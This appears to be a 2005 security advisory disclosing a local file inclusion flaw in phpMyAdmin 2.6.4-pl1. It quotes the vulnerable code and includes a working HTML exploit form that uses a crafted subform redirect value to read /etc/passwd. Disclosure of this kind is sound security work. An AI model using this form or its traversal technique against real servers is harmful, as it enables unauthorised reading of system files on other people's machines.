[phpMyAdmin Local file inclusion 2.6.4-pl1]
Author: Maksymilian Arciemowicz
Date: 10.10.2005
- --- 0.Description ---
phpMyAdmin 2.6.4 is a tool written in PHP intended to
handle the administration of MySQL over the Web.
Currently it can create and drop databases,
create/drop/alter tables, delete/edit/add fields,
execute any SQL statement, manage keys on fields.
blablabla...
phpMyAdmin is very dangerous script.
- --- 1. Local file inclusion (Critical) ---
File: ./libraries/grab_globals.lib.php
This file is included by many files. Example file index.php
- -index.php--
<?php
/* $Id: index.php,v 2.14 2004/10/19 17:23:09 nijel Exp $ */
// vim: expandtab sw=4 ts=4 sts=4:
/**
* Gets core libraries and defines some variables
*/
require_once('./libraries/grab_globals.lib.php');
require_once('./libraries/common.lib.php');
...
- -index.php--
ok so. In ./libraries/grab_globals.lib.php we have:
- -101-104-grab_globals.lib.php---------
if ( ! empty( $__redirect ) ) {
require('./' . $__redirect);
exit();
} // end if ( ! empty( $__redirect ) )
- -101-104-grab_globals.lib.php---------
But before we have
- -53-67-grab_globals.lib.php-----------
// check if a subform is submitted
$__redirect = NULL;
if ( isset( $_POST['usesubform'] ) ) {
// if a subform is present and should be used
// the rest of the form is deprecated
$subform_id = key( $_POST['usesubform'] );
$subform = $_POST['subform'][$subform_id];
$_POST = $subform;
if ( isset( $_POST['redirect'] )
&& $_POST['redirect'] != basename( $_SERVER['PHP_SELF'] ) ) {
$__redirect = $_POST['redirect'];
unset( $_POST['redirect'] );
} // end if ( isset( $_POST['redirect'] ) )
} // end if ( isset( $_POST['usesubform'] ) )
// end check if a subform is submitted
- -53-67-grab_globals.lib.php-----------
If varible $_POST['usesubform'] exists and is array, that we can created new varibles for $_POST (example $_POST['redirect']).
$subform = $_POST['subform'][$subform_id];
$_POST = $subform;
where array $_POST = array $_POST[subform][1]
that
$_POST['redirect']=$_POST[subform][1][redirect]
and we have local file inclusion.
Example response in html:
- -Exploit---
<CENTER>
<A HREF="http://cxsecurity.com><IMG SRC="http://cxsecurity.com/gfx/small_logo.png"></A><P>
<FORM action="http://localhost/phpMyAdmin-2.6.4-pl1/index.php" method=post enctype="multipart/form-data">
<input TYPE="hidden" name="usesubform[1]" value="1">
<input TYPE="hidden" name="usesubform[2]" value="1">
<input TYPE="text" name="subform[1][redirect]" value="../../../../../../../etc/passwd" size=30> File<p>
<input TYPE="hidden" name="subform[1][cXIb8O3]" value="1">
<input TYPE="submit" value="Exploit">
</FORM>
- -Exploit---
Exploit:
http://cxsecurity.com/cxexploit/2
- --- 2.Contact ---
Author: Maksymilian Arciemowicz